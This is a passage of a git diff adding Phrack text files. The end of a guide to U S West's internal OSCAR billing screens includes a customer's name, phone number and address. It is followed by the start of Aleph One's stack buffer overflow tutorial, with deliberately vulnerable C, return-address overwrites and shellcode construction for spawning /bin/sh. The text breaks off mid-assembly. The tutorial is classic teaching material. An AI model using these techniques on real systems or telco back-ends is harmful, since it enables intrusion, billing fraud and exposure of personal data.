+something like this:
+
++-----------------------------------------------------------------------------+
+|CMD                             MSG                                          |
+|                          BILL                             P     1   S   1   |
+|                                   BILL DATE:  JUNE 23, 1996                 |
+|                                   ACCOUNT NUMBER:                           |
+|                                                                             |
+|                                        PAYMENT DUE        JUL 12,     1996  |
+|    866 W. TNO Ave                                                           |
+|    MERIDIAN CO 80301-0869                                                   |
+|                                        AMOUNT DUE               $102.88     |
+|                                                                             |
+|51 03208172009708711   1227021296  000000000000   000000051409               |
+|                                                                             |
+|PAY U S WEST COMMUNICATIONS                                                  |
+|TOTAL DUE                                                                    |
+|          *836229150!                                                        |
++-----------------------------------------------------------------------------+
+
+PF11 will take you to the next screen of the bill.  'P' will take you to
+the next page of the bill.  'P' followed by a number will take you to that
+numbered page.  PF2 will return you to the first screen of the bill.
+
+Here is a sample of the second screen of a bill:
+
++-----------------------------------------------------------------------------+
+|CMD                             MSG                                          |
+|                          BILL                             P     1   S   2   |
+|                                                           PAGE          1   |
+|                                               BILL DATE:  JUN 23, 1996      |
+|       MERIDIAN, CO 80301-0869                 ACCOUNT NUMBER:               |
+|                                                                             |
+|PREVIOUS BILL       PAYMENTS     ADJUSTMENTS  PASTDUE                        |
+|      $30.06        $30.06             $0.00  DISREGARD IF PAID  $0.00       |
+|                                                                             |
+|THANK YOU FOR YOUR PAYMENT             CURRENT CHARGES           $102.88     |
+|                                                                             |
+|                                       PAYMENT DUE         JUL 12,     1996  |
+|                                                                             |
+|                                       AMOUNT DUE               $102.88      |
+|                                                                             |
+|SUMMARY OF CURRENT CHARGES                                                   |
+|                                                                             |
+|     AT&T..............................................................      |
++-----------------------------------------------------------------------------+
+
+
+PF3 will bring you to the Print Verification Screen:
+
++-----------------------------------------------------------------------------+
+|CMD                             MSG   PRINT SUCCESSFUL, ENTER NEXT COMMAND   |
+|                              PRINT                                          |
+|                                                                             |
+|303   343   4053   871(a) B DATE:   0696 (b)        FORWARD RANGE: (c)       |
+|                                                                             |
+|NAME:       KEVIN MITNICK                           NO. OF BILLS: (d)        |
+|                                                                             |
+|     ADDRESS VERIFICATION                                                    |
+|
+|L1:  10288 E. 6TH (e)
+|L2:  AURORA  CO
+|L3:
+|L4:
+|ZIP: 80010 3612
++-----------------------------------------------------------------------------+
+
+        (a) Customer telephone number and account code
+        (b) Bill date
+        (c) Number of months to print bills for
+        (d) Number of copies to print
+        (e) Customer address
+
+Press PF1 to return to the Main Menu or PF3 to print duplicate bills for
+mailing to the customer address.
+
+Other useful commands within OSCAR are 'F' for finding strings and 'R'
+to repeat a find.  Use the LOFF command to log off.
+
+
+
+                .----------------------------------------------.
+                | Part IV: Relevant Acronyms and Abbreviations |
+                `----------------------------------------------'
+
+ABIL		Adjustment Bill
+AC		Account Classification
+ANI             Automatic Number Identification
+ARBL            As Rendered Bill
+ASUM		Adjustments Summary
+BD		Bank Draft
+BD		Bill Date
+BDPP		Bank Draft Payment Plan
+BEAR		Billed Entity As Rendered
+BESS		Billed Entry Status Screen
+BLF             Blocking Failure
+BO              Business Office
+BOSS		Billing and Order Support System
+BP		Bill Period
+BSC		Business Service Center
+CAMC            Corporate Address Maintenance Center
+CARS            Customer Access and Retrieval System
+CAS		Customer Approval System
+CBR		Can Be Reached
+CC		Credit Class
+CCH		Calling Cards Held
+CCG		Current Charges
+CCSR		Current Customer Service Record
+CI		Credit Information
+CIF		Communications Impaired Fund
+CIV		Credit Information Verified
+CMC		Credit Management Center
+CN		Concession Service
+CNA             Customer Name and Address
+CNC             Call Not Completed
+CNL             Customer Name and Locality
+CORD            Customer Order Retrieval and Display
+COS		Customer's Other Service
+COSMOS		Computer System for Mainframe Operations
+CRIS		Customer Record Information System
+CSBL		Current Status Bill Screen
+CSR		Customer Service Record
+CT		Carryover Treat History
+CTO             Cut-Off
+DAC             Directory Assistance Charges
+DAK             Denies All Knowledge
+DCK             Dishonored Check History
+DDD             Direct Distance Dialing
+DEP             Deposit
+DN		Denial Notice
+DOI		Date Of Installation
+DUP             Duplicate Billing
+ES              Entity Status
+FACS		Facility Administration Control System
+FCE             Federal Access Charge
+FOMS		Frame Operations Management System
+FRN		Franchise Fee
+FU		Follow-up
+FUSA		Frame User assignment System Access
+HB		Held Bill
+IC		Itemized Calls
+INR             Incorrect Rate
+LAL             Local Usage Units Allowed
+LCR		Local Usage Units Credited
+LCU		Local Units Used
+LDD		Long Distance Detail
+LDT		Legislative Deaf Tax
+LPC		Late Payment Charge
+LPC             Loop Provisioning Center
+LU              Local Usage
+MIG		Message Investigation Center
+MIS             Miscellaneous
+NOB             Number of Bills
+NTN		New Telephone Number
+OCC		Other Charges and Credits
+OCP		Optional Calling Plan
+ONI             Operator Number Identification
+OSCAR           Optical Storage COM Application Replacement
+OSP             Operator Service Provider
+OTN             Old Telephone Number
+MPS             Message Processing Service
+PADJ            Payments and Adjustments
+PB		Pay By Date
+PDN		Past Due Notice
+PN		Position Number
+PPD		Preferred Payment Date
+PREMIS		Premisis Information System
+PTR             Poor Transmission
+QTF             Query Treatment Follow-up
+QTFU		Query Treatment Follow-up
+RCK		Returned Check History
+REB             Rebill
+REF             Refuse to Pay
+RMKS            Remarks
+RP		Responsible Party
+RSB		Repair Service Bureau
+RSC		Repair Service Center
+RT		Remove from Treatment
+RTA		Remove from Treatment Amount
+S&E		Service & Equipment
+SAG             Street Address Guide
+SAGA            Street Address Guide Area
+TAF             Telephone Assistance Fund
+TAP		Telephone Assistance Plan
+TAR		Tax Area Code
+TCAT            Telephone Category
+TIM             Timing
+TOPS            Traffic Operator Position System
+TRFU            Treatment and Follow-Up
+TRMT		Treatment
+UBIC		Unbilled Itemized Call
+USOC		Universal Service Order Code
+PAH		Previous Account History
+PIC/PICX	Presubscribed Interexchange Carrier
+SCD		Selective Carrier Denial
+SI		Supplemental Input
+SOLAR		Service Order Logistics and Reference  
+SONAR		Service Order Negotiation and Retrieval 
+SOPAD		Service Order Provisioning and Distribution 
+USF		Universal Service Fund
+USOC		Universal Service Order Code
+UWM		Unregulated Wire Maintenance
+VL		Voice Link
+VMS		Voice Messaging Service
+WC              Wire Center
+WMC             Wire Maintenance Contract
+WNO             Wrong Number Reached
+
+
+
+                .-----------------.
+                | Part V: Credits |
+                `-----------------'
+
+Thanks to Crimson Flash for the USOC and Line Class Codes which were taken
+from his article "The Fine Art of Telephony" in Phrack 40.
+
+Thanks to Major for his dedication to gathering information.
+
+Thanks to DisordeR for his technical assistance in writing this article.
+
+But most of all... thanks to U.S. West for making this all possible.
+
diff --git a/phrack49/14.txt b/phrack49/14.txt
new file mode 100644
index 0000000..33a9cc4
--- /dev/null
+++ b/phrack49/14.txt
@@ -0,0 +1,1747 @@
+                               .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+                                     
+                                  File 14 of 16
+
+                      BugTraq, r00t, and Underground.Org
+                                   bring you
+
+                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+                     Smashing The Stack For Fun And Profit
+                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+                                 by Aleph One
+                             aleph1@underground.org
+
+	`smash the stack` [C programming] n. On many C implementations
+	it is possible to corrupt the execution stack by writing past
+	the end of an array declared auto in a routine.  Code that does
+	this is said to smash the stack, and can cause return from the
+	routine to jump to a random address.  This can produce some of
+	the most insidious data-dependent bugs known to mankind.
+	Variants include trash the stack, scribble the stack, mangle
+	the stack; the term mung the stack is not used, as this is
+	never done intentionally. See spam; see also alias bug,
+	fandango on core, memory leak, precedence lossage, overrun screw.
+
+
+                                 Introduction
+                                 ~~~~~~~~~~~~
+
+   Over the last few months there has been a large increase of buffer
+overflow vulnerabilities being both discovered and exploited.  Examples
+of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt 
+library, at, etc.  This paper attempts to explain what buffer overflows 
+are, and how their exploits work.
+
+   Basic knowledge of assembly is required.  An understanding of virtual 
+memory concepts, and experience with gdb are very helpful but not necessary.
+We also assume we are working with an Intel x86 CPU, and that the operating 
+system is Linux.
+
+   Some basic definitions before we begin: A buffer is simply a contiguous 
+block of computer memory that holds multiple instances of the same data 
+type.  C programmers normally associate with the word buffer arrays. Most 
+commonly, character arrays.  Arrays, like all variables in C, can be 
+declared either static or dynamic.  Static variables are allocated at load 
+time on the data segment.  Dynamic variables are allocated at run time on 
+the stack. To overflow is to flow, or fill over the top, brims, or bounds. 
+We will concern ourselves only with the overflow of dynamic buffers, otherwise
+known as stack-based buffer overflows.
+
+
+                          Process Memory Organization
+                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+   To understand what stack buffers are we must first understand how a
+process is organized in memory.  Processes are divided into three regions:
+Text, Data, and Stack.  We will concentrate on the stack region, but first
+a small overview of the other regions is in order.
+
+   The text region is fixed by the program and includes code (instructions)
+and read-only data.  This region corresponds to the text section of the
+executable file.  This region is normally marked read-only and any attempt to
+write to it will result in a segmentation violation.
+
+   The data region contains initialized and uninitialized data.  Static
+variables are stored in this region.  The data region corresponds to the
+data-bss sections of the executable file.  Its size can be changed with the
+brk(2) system call.  If the expansion of the bss data or the user stack
+exhausts available memory, the process is blocked and is rescheduled to
+run again with a larger memory space. New memory is added between the data
+and stack segments.
+
+                             /------------------\  lower
+                             |                  |  memory
+                             |       Text       |  addresses
+                             |                  |
+                             |------------------|
+                             |   (Initialized)  |
+                             |        Data      |
+                             |  (Uninitialized) |
+                             |------------------|
+                             |                  |
+                             |       Stack      |  higher
+                             |                  |  memory
+                             \------------------/  addresses
+
+                         Fig. 1 Process Memory Regions
+
+
+                               What Is A Stack?
+                               ~~~~~~~~~~~~~~~~
+
+   A stack is an abstract data type frequently used in computer science.  A
+stack of objects has the property that the last object placed on the stack
+will be the first object removed.  This property is commonly referred to as
+last in, first out queue, or a LIFO.
+
+   Several operations are defined on stacks.  Two of the most important are
+PUSH and POP.  PUSH adds an element at the top of the stack.  POP, in 
+contrast, reduces the stack size by one by removing the last element at the 
+top of the stack.
+
+
+                            Why Do We Use A Stack?
+                            ~~~~~~~~~~~~~~~~~~~~~~
+
+   Modern computers are designed with the need of high-level languages in
+mind.  The most important technique for structuring programs introduced by
+high-level languages is the procedure or function.  From one point of view, a
+procedure call alters the flow of control just as a jump does, but unlike a
+jump, when finished performing its task, a function returns control to the 
+statement or instruction following the call.  This high-level abstraction
+is implemented with the help of the stack.
+
+  The stack is also used to dynamically allocate the local variables used in
+functions, to pass parameters to the functions, and to return values from the
+function.
+
+
+                               The Stack Region
+                               ~~~~~~~~~~~~~~~~
+
+   A stack is a contiguous block of memory containing data.  A register called
+the stack pointer (SP) points to the top of the stack.  The bottom of the 
+stack is at a fixed address.  Its size is dynamically adjusted by the kernel 
+at run time. The CPU implements instructions to PUSH onto and POP off of the 
+stack. 
+
+   The stack consists of logical stack frames that are pushed when calling a
+function and popped when returning.  A stack frame contains the parameters to 
+a function, its local variables, and the data necessary to recover the 
+previous stack frame, including the value of the instruction pointer at the 
+time of the function call.
+
+   Depending on the implementation the stack will either grow down (towards
+lower memory addresses), or up.  In our examples we'll use a stack that grows
+down.  This is the way the stack grows on many computers including the Intel, 
+Motorola, SPARC and MIPS processors.  The stack pointer (SP) is also
+implementation dependent.  It may point to the last address on the stack, or 
+to the next free available address after the stack.  For our discussion we'll
+assume it points to the last address on the stack.
+
+   In addition to the stack pointer, which points to the top of the stack
+(lowest numerical address), it is often convenient to have a frame pointer
+(FP) which points to a fixed location within a frame.  Some texts also refer
+to it as a local base pointer (LB).  In principle, local variables could be
+referenced by giving their offsets from SP.  However, as words are pushed onto
+the stack and popped from the stack, these offsets change.  Although in some
+cases the compiler can keep track of the number of words on the stack and
+thus correct the offsets, in some cases it cannot, and in all cases
+considerable administration is required.  Futhermore, on some machines, such
+as Intel-based processors, accessing a variable at a known distance from SP
+requires multiple instructions.
+
+   Consequently, many compilers use a second register, FP, for referencing
+both local variables and parameters because their distances from FP do
+not change with PUSHes and POPs.  On Intel CPUs, BP (EBP) is used for this 
+purpose.  On the Motorola CPUs, any address register except A7 (the stack 
+pointer) will do.  Because the way our stack grows, actual parameters have 
+positive offsets and local variables have negative offsets from FP.
+
+   The first thing a procedure must do when called is save the previous FP
+(so it can be restored at procedure exit).  Then it copies SP into FP to 
+create the new FP, and advances SP to reserve space for the local variables. 
+This code is called the procedure prolog.  Upon procedure exit, the stack 
+must be cleaned up again, something called the procedure epilog.  The Intel 
+ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, 
+have been provided to do most of the procedure prolog and epilog work 
+efficiently. 
+
+   Let us see what the stack looks like in a simple example:
+
+example1.c:
+------------------------------------------------------------------------------
+void function(int a, int b, int c) {
+   char buffer1[5];
+   char buffer2[10];
+}
+
+void main() {
+  function(1,2,3);
+}
+------------------------------------------------------------------------------
+
+   To understand what the program does to call function() we compile it with
+gcc using the -S switch to generate assembly code output:
+
+$ gcc -S -o example1.s example1.c
+
+   By looking at the assembly language output we see that the call to
+function() is translated to:
+
+        pushl $3
+        pushl $2
+        pushl $1
+        call function
+
+    This pushes the 3 arguments to function backwards into the stack, and
+calls function().  The instruction 'call' will push the instruction pointer
+(IP) onto the stack.  We'll call the saved IP the return address (RET).  The
+first thing done in function is the procedure prolog:
+
+        pushl %ebp
+        movl %esp,%ebp
+        subl $20,%esp
+
+   This pushes EBP, the frame pointer, onto the stack.  It then copies the
+current SP onto EBP, making it the new FP pointer.  We'll call the saved FP
+pointer SFP.  It then allocates space for the local variables by subtracting
+their size from SP.
+
+   We must remember that memory can only be addressed in multiples of the
+word size.  A word in our case is 4 bytes, or 32 bits.  So our 5 byte buffer
+is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer
+is going to take 12 bytes (3 words) of memory.  That is why SP is being
+subtracted by 20.  With that in mind our stack looks like this when
+function() is called (each space represents a byte):
+
+
+bottom of                                                            top of
+memory                                                               memory
+           buffer2       buffer1   sfp   ret   a     b     c
+<------   [            ][        ][    ][    ][    ][    ][    ]
+	   
+top of                                                            bottom of
+stack                                                                 stack
+
+
+                               Buffer Overflows
+                               ~~~~~~~~~~~~~~~~
+
+   A buffer overflow is the result of stuffing more data into a buffer than
+it can handle.  How can this often found programming error can be taken
+advantage to execute arbitrary code?  Lets look at another example:
+
+example2.c
+------------------------------------------------------------------------------
+void function(char *str) {
+   char buffer[16];
+
+   strcpy(buffer,str);
+}
+
+void main() {
+  char large_string[256];
+  int i;
+
+  for( i = 0; i < 255; i++)
+    large_string[i] = 'A';
+
+  function(large_string);
+}
+------------------------------------------------------------------------------
+
+   This is program has a function with a typical buffer overflow coding
+error.  The function copies a supplied string without bounds checking by
+using strcpy() instead of strncpy().  If you run this program you will get a
+segmentation violation.  Lets see what its stack looks when we call function:
+
+
+bottom of                                                            top of
+memory                                                               memory
+                  buffer            sfp   ret   *str
+<------          [                ][    ][    ][    ]
+
+top of                                                            bottom of
+stack                                                                 stack
+
+
+   What is going on here?  Why do we get a segmentation violation?  Simple.
+strcpy() is coping the contents of *str (larger_string[]) into buffer[]
+until a null character is found on the string.  As we can see buffer[] is
+much smaller than *str.  buffer[] is 16 bytes long, and we are trying to stuff
+it with 256 bytes.  This means that all 250 bytes after buffer in the stack
+are being overwritten.  This includes the SFP, RET, and even *str!  We had 
+filled large_string with the character 'A'.  It's hex character value
+is 0x41.  That means that the return address is now 0x41414141.  This is
+outside of the process address space.  That is why when the function returns
+and tries to read the next instruction from that address you get a 
+segmentation violation.
+
+   So a buffer overflow allows us to change the return address of a function.
+In this way we can change the flow of execution of the program.  Lets go back
+to our first example and recall what the stack looked like:
+
+
+bottom of                                                            top of
+memory                                                               memory
+           buffer2       buffer1   sfp   ret   a     b     c
+<------   [            ][        ][    ][    ][    ][    ][    ]
+
+top of                                                            bottom of
+stack                                                                 stack
+
+
+   Lets try to modify our first example so that it overwrites the return
+address, and demonstrate how we can make it execute arbitrary code.  Just
+before buffer1[] on the stack is SFP, and before it, the return address.
+That is 4 bytes pass the end of buffer1[].  But remember that buffer1[] is
+really 2 word so its 8 bytes long.  So the return address is 12 bytes from
+the start of buffer1[].  We'll modify the return value in such a way that the
+assignment statement 'x = 1;' after the function call will be jumped.  To do
+so we add 8 bytes to the return address.  Our code is now:
+
+example3.c:
+------------------------------------------------------------------------------
+void function(int a, int b, int c) {
+   char buffer1[5];
+   char buffer2[10];
+   int *ret;
+
+   ret = buffer1 + 12;
+   (*ret) += 8;
+}
+
+void main() {
+  int x;
+
+  x = 0;
+  function(1,2,3);
+  x = 1;
+  printf("%d\n",x);
+}
+------------------------------------------------------------------------------
+
+   What we have done is add 12 to buffer1[]'s address.  This new address is
+where the return address is stored.  We want to skip pass the assignment to
+the printf call.  How did we know to add 8 to the return address?  We used a
+test value first (for example 1), compiled the program, and then started gdb:
+
+------------------------------------------------------------------------------
+[aleph1]$ gdb example3
+GDB is free software and you are welcome to distribute copies of it
+ under certain conditions; type "show copying" to see the conditions.
+There is absolutely no warranty for GDB; type "show warranty" for details.
+GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
+(no debugging symbols found)...
+(gdb) disassemble main
+Dump of assembler code for function main:
+0x8000490 <main>:       pushl  %ebp
+0x8000491 <main+1>:     movl   %esp,%ebp
+0x8000493 <main+3>:     subl   $0x4,%esp
+0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
+0x800049d <main+13>:    pushl  $0x3
+0x800049f <main+15>:    pushl  $0x2
+0x80004a1 <main+17>:    pushl  $0x1
+0x80004a3 <main+19>:    call   0x8000470 <function>
+0x80004a8 <main+24>:    addl   $0xc,%esp
+0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
+0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
+0x80004b5 <main+37>:    pushl  %eax
+0x80004b6 <main+38>:    pushl  $0x80004f8
+0x80004bb <main+43>:    call   0x8000378 <printf>
+0x80004c0 <main+48>:    addl   $0x8,%esp
+0x80004c3 <main+51>:    movl   %ebp,%esp
+0x80004c5 <main+53>:    popl   %ebp
+0x80004c6 <main+54>:    ret
+0x80004c7 <main+55>:    nop
+------------------------------------------------------------------------------
+
+   We can see that when calling function() the RET will be 0x8004a8, and we
+want to jump past the assignment at 0x80004ab.  The next instruction we want
+to execute is the at 0x8004b2.  A little math tells us the distance is 8
+bytes.
+
+
+                                  Shell Code
+                                  ~~~~~~~~~~
+
+   So now that we know that we can modify the return address and the flow of
+execution, what program do we want to execute?  In most cases we'll simply
+want the program to spawn a shell.  From the shell we can then issue other
+commands as we wish.  But what if there is no such code in the program we
+are trying to exploit?  How can we place arbitrary instruction into its
+address space?  The answer is to place the code with are trying to execute in
+the buffer we are overflowing, and overwrite the return address so it points
+back into the buffer.  Assuming the stack starts at address 0xFF, and that S
+stands for the code we want to execute the stack would then look like this:
+
+
+bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
+memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
+           buffer                sfp   ret   a     b     c
+
+<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
+           ^                            |
+           |____________________________|
+top of                                                            bottom of
+stack                                                                 stack
+
+
+The code to spawn a shell in C looks like:
+
+shellcode.c
+-----------------------------------------------------------------------------
+#include <stdio.h>
+
+void main() {
+   char *name[2];
+
+   name[0] = "/bin/sh";
+   name[1] = NULL;
+   execve(name[0], name, NULL);
+}
+------------------------------------------------------------------------------
+
+   To find out what does it looks like in assembly we compile it, and start
+up gdb.  Remember to use the -static flag. Otherwise the actual code the
+for the execve system call will not be included.  Instead there will be a
+reference to dynamic C library that would normally would be linked in at
+load time.
+
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
+[aleph1]$ gdb shellcode
+GDB is free software and you are welcome to distribute copies of it
+ under certain conditions; type "show copying" to see the conditions.
+There is absolutely no warranty for GDB; type "show warranty" for details.
+GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
+(gdb) disassemble main
+Dump of assembler code for function main:
+0x8000130 <main>:       pushl  %ebp
+0x8000131 <main+1>:     movl   %esp,%ebp
+0x8000133 <main+3>:     subl   $0x8,%esp
+0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
+0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
+0x8000144 <main+20>:    pushl  $0x0
+0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
+0x8000149 <main+25>:    pushl  %eax
+0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
+0x800014d <main+29>:    pushl  %eax
+0x800014e <main+30>:    call   0x80002bc <__execve>
+0x8000153 <main+35>:    addl   $0xc,%esp
+0x8000156 <main+38>:    movl   %ebp,%esp
+0x8000158 <main+40>:    popl   %ebp
+0x8000159 <main+41>:    ret
+End of assembler dump.
+(gdb) disassemble __execve
+Dump of assembler code for function __execve:
+0x80002bc <__execve>:   pushl  %ebp
+0x80002bd <__execve+1>: movl   %esp,%ebp
+0x80002bf <__execve+3>: pushl  %ebx
+0x80002c0 <__execve+4>: movl   $0xb,%eax
+0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
+0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
+0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
+0x80002ce <__execve+18>:        int    $0x80
+0x80002d0 <__execve+20>:        movl   %eax,%edx
+0x80002d2 <__execve+22>:        testl  %edx,%edx
+0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
+0x80002d6 <__execve+26>:        negl   %edx
+0x80002d8 <__execve+28>:        pushl  %edx
+0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
+0x80002de <__execve+34>:        popl   %edx
+0x80002df <__execve+35>:        movl   %edx,(%eax)
+0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
+0x80002e6 <__execve+42>:        popl   %ebx
+0x80002e7 <__execve+43>:        movl   %ebp,%esp
+0x80002e9 <__execve+45>:        popl   %ebp
+0x80002ea <__execve+46>:        ret
+0x80002eb <__execve+47>:        nop
+End of assembler dump.
+------------------------------------------------------------------------------
+
+Lets try to understand what is going on here. We'll start by studying main:
+
+------------------------------------------------------------------------------
+0x8000130 <main>:       pushl  %ebp
+0x8000131 <main+1>:     movl   %esp,%ebp
+0x8000133 <main+3>:     subl   $0x8,%esp
+
+	This is the procedure prelude.  It first saves the old frame pointer,
+	makes the current stack pointer the new frame pointer, and leaves 
+	space for the local variables. In this case its:
+
+	char *name[2];
+
+	or 2 pointers to a char. Pointers are a word long, so it leaves
+	space for two words (8 bytes).
+
+0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
+
+	We copy the value 0x80027b8 (the address of the string "/bin/sh")
+	into the first pointer of name[]. This is equivalent to:
+
+	name[0] = "/bin/sh";
+
+0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
+
+	We copy the value 0x0 (NULL) into the seconds pointer of name[].
+	This is equivalent to:
+
+	name[1] = NULL;
+
+	The actual call to execve() starts here.
+
+0x8000144 <main+20>:    pushl  $0x0
+
+	We push the arguments to execve() in reverse order onto the stack.
+	We start with NULL.
+
+0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
+
+	We load the address of name[] into the EAX register.
+
+0x8000149 <main+25>:    pushl  %eax
+
+	We push the address of name[] onto the stack.
+
+0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
+
+	We load the address of the string "/bin/sh" into the EAX register.
+
+0x800014d <main+29>:    pushl  %eax
+
+	We push the address of the string "/bin/sh" onto the stack.
+
+0x800014e <main+30>:    call   0x80002bc <__execve>
+
+	Call the library procedure execve().  The call instruction pushes the
+	IP onto the stack.
+------------------------------------------------------------------------------
+
+   Now execve().  Keep in mind we are using a Intel based Linux system.  The
+syscall details will change from OS to OS, and from CPU to CPU.  Some will 
+pass the arguments on the stack, others on the registers.  Some use a software
+interrupt to jump to kernel mode, others use a far call.  Linux passes its 
+arguments to the system call on the registers, and uses a software interrupt 
+to jump into kernel mode.
+
+------------------------------------------------------------------------------
+0x80002bc <__execve>:   pushl  %ebp
+0x80002bd <__execve+1>: movl   %esp,%ebp
+0x80002bf <__execve+3>: pushl  %ebx
+
+	The procedure prelude.
+
+0x80002c0 <__execve+4>: movl   $0xb,%eax
+
+	Copy 0xb (11 decimal) onto the stack. This is the index into the
+	syscall table.  11 is execve.
+
+0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
+
+	Copy the address of "/bin/sh" into EBX.
+
+0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
+
+	Copy the address of name[] into ECX.
+
+0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
+
+	Copy the address of the null pointer into %edx.
+
+0x80002ce <__execve+18>:        int    $0x80
+
+	Change into kernel mode.
+------------------------------------------------------------------------------
+
+So as we can see there is not much to the execve() system call.  All we need
+to do is:
+
+	a) Have the null terminated string "/bin/sh" somewhere in memory.
+	b) Have the address of the string "/bin/sh" somewhere in memory
+	   followed by a null long word.
+	c) Copy 0xb into the EAX register.
+	d) Copy the address of the address of the string "/bin/sh" into the
+	   EBX register.
+	e) Copy the address of the string "/bin/sh" into the ECX register.
+	f) Copy the address of the null long word into the EDX register.
+	g) Execute the int $0x80 instruction.
+
+   But what if the execve() call fails for some reason?  The program will
+continue fetching instructions from the stack, which may contain random data!
+The program will most likely core dump.  We want the program to exit cleanly
+if the execve syscall fails.  To accomplish this we must then add a exit
+syscall after the execve syscall.  What does the exit syscall looks like?
+
+exit.c
+------------------------------------------------------------------------------
+#include <stdlib.h>
+
+void main() {
+        exit(0);
+}
+------------------------------------------------------------------------------
+
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o exit -static exit.c
+[aleph1]$ gdb exit
+GDB is free software and you are welcome to distribute copies of it
+ under certain conditions; type "show copying" to see the conditions.
+There is absolutely no warranty for GDB; type "show warranty" for details.
+GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
+(no debugging symbols found)...
+(gdb) disassemble _exit
+Dump of assembler code for function _exit:
+0x800034c <_exit>:      pushl  %ebp
+0x800034d <_exit+1>:    movl   %esp,%ebp
+0x800034f <_exit+3>:    pushl  %ebx
+0x8000350 <_exit+4>:    movl   $0x1,%eax
+0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
+0x8000358 <_exit+12>:   int    $0x80
+0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
+0x800035d <_exit+17>:   movl   %ebp,%esp
+0x800035f <_exit+19>:   popl   %ebp
+0x8000360 <_exit+20>:   ret
+0x8000361 <_exit+21>:   nop
+0x8000362 <_exit+22>:   nop
+0x8000363 <_exit+23>:   nop
+End of assembler dump.
+------------------------------------------------------------------------------
+
+   The exit syscall will place 0x1 in EAX, place the exit code in EBX,
+and execute "int 0x80".  That's it.  Most applications return 0 on exit to
+indicate no errors.  We will place 0 in EBX.  Our list of steps is now:
+
+	a) Have the null terminated string "/bin/sh" somewhere in memory.
+	b) Have the address of the string "/bin/sh" somewhere in memory
+	   followed by a null long word.
+	c) Copy 0xb into the EAX register.
+	d) Copy the address of the address of the string "/bin/sh" into the
+	   EBX register.
+	e) Copy the address of the string "/bin/sh" into the ECX register.
+	f) Copy the address of the null long word into the EDX register.
+	g) Execute the int $0x80 instruction.
+	h) Copy 0x1 into the EAX register.
+	i) Copy 0x0 into the EBX register.
+	j) Execute the int $0x80 instruction.
+
+   Trying to put this together in assembly language, placing the string
+after the code, and remembering we will place the address of the string,
+and null word after the array, we have:
+
+------------------------------------------------------------------------------
+        movl   string_addr,string_addr_addr
+	movb   $0x0,null_byte_addr
+        movl   $0x0,null_addr
+        movl   $0xb,%eax
+        movl   string_addr,%ebx
+        leal   string_addr,%ecx
+        leal   null_string,%edx
+        int    $0x80
+        movl   $0x1, %eax
+        movl   $0x0, %ebx
+	int    $0x80
+        /bin/sh string goes here.
+------------------------------------------------------------------------------
+
+   The problem is that we don't know where in the memory space of the 
+program we are trying to exploit the code (and the string that follows 
+it) will be placed.  One way around it is to use a JMP, and a CALL 
+instruction.  The JMP and CALL instructions can use IP relative addressing, 
+which means we can jump to an offset from the current IP without needing 
+to know the exact address of where in memory we want to jump to.  If we 
+place a CALL instruction right before the "/bin/sh" string, and a JMP 
+instruction to it, the strings address will be pushed onto the stack as 
+the return address when CALL is executed.  All we need then is to copy the 
+return address into a register.  The CALL instruction can simply call the 
+start of our code above.  Assuming now that J stands for the JMP instruction,
+C for the CALL instruction, and s for the string,  the execution flow would 
+now be:
+
+
+bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
+memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
+           buffer                sfp   ret   a     b     c
+
+<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
+           ^|^             ^|            |
+           |||_____________||____________| (1)
+       (2)  ||_____________||
+             |______________| (3)
+top of                                                            bottom of
+stack                                                                 stack
+
+
+
+   With this modifications, using indexed addressing, and writing down how
+many bytes each instruction takes our code looks like:
+
+------------------------------------------------------------------------------
+        jmp    offset-to-call           # 2 bytes
+        popl   %esi                     # 1 byte
+        movl   %esi,array-offset(%esi)  # 3 bytes
+        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
+        movl   $0x0,null-offset(%esi)   # 7 bytes
+        movl   $0xb,%eax                # 5 bytes
+        movl   %esi,%ebx                # 2 bytes
+        leal   array-offset,(%esi),%ecx # 3 bytes
+        leal   null-offset(%esi),%edx   # 3 bytes
+        int    $0x80                    # 2 bytes
